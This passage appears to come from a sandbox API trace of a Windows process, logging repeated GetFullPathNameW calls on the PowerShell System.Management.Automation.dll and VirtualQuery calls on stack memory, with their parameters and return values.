	[0412.208] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.209] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.209] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.209] VirtualQuery (in: lpAddress=0xcb0d0, lpBuffer=0xcbf90, dwLength=0x30 | out: lpBuffer=0xcbf90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.209] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.209] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.209] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.209] VirtualQuery (in: lpAddress=0xcb0d0, lpBuffer=0xcbf90, dwLength=0x30 | out: lpBuffer=0xcbf90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.209] VirtualQuery (in: lpAddress=0xcb160, lpBuffer=0xcc020, dwLength=0x30 | out: lpBuffer=0xcc020*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.210] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb890, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.210] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.210] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.210] VirtualQuery (in: lpAddress=0xcb0d0, lpBuffer=0xcbf90, dwLength=0x30 | out: lpBuffer=0xcbf90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.210] VirtualQuery (in: lpAddress=0xcb160, lpBuffer=0xcc020, dwLength=0x30 | out: lpBuffer=0xcc020*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.210] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb890, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.210] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.210] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.210] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.210] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.211] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.211] VirtualQuery (in: lpAddress=0xcb0d0, lpBuffer=0xcbf90, dwLength=0x30 | out: lpBuffer=0xcbf90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.211] VirtualQuery (in: lpAddress=0xcb160, lpBuffer=0xcc020, dwLength=0x30 | out: lpBuffer=0xcc020*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.211] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb890, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.211] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.211] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.211] VirtualQuery (in: lpAddress=0xcb0d0, lpBuffer=0xcbf90, dwLength=0x30 | out: lpBuffer=0xcbf90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.211] VirtualQuery (in: lpAddress=0xcb160, lpBuffer=0xcc020, dwLength=0x30 | out: lpBuffer=0xcc020*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.211] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.211] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.212] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.212] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.212] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.212] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.212] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.212] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.212] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.212] VirtualQuery (in: lpAddress=0xcb0d0, lpBuffer=0xcbf90, dwLength=0x30 | out: lpBuffer=0xcbf90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.212] VirtualQuery (in: lpAddress=0xcb160, lpBuffer=0xcc020, dwLength=0x30 | out: lpBuffer=0xcc020*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.212] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb890, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.212] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.212] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.213] VirtualQuery (in: lpAddress=0xcb0d0, lpBuffer=0xcbf90, dwLength=0x30 | out: lpBuffer=0xcbf90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.213] VirtualQuery (in: lpAddress=0xcb160, lpBuffer=0xcc020, dwLength=0x30 | out: lpBuffer=0xcc020*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.213] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb890, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.213] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.213] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.213] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.213] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.213] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.213] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.213] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.213] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.214] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.214] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.214] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.214] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.214] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.214] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.214] VirtualQuery (in: lpAddress=0xcbb70, lpBuffer=0xcca30, dwLength=0x30 | out: lpBuffer=0xcca30*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.214] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.214] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.214] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.215] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.215] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.215] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.215] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.215] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.215] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.215] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.215] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.215] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
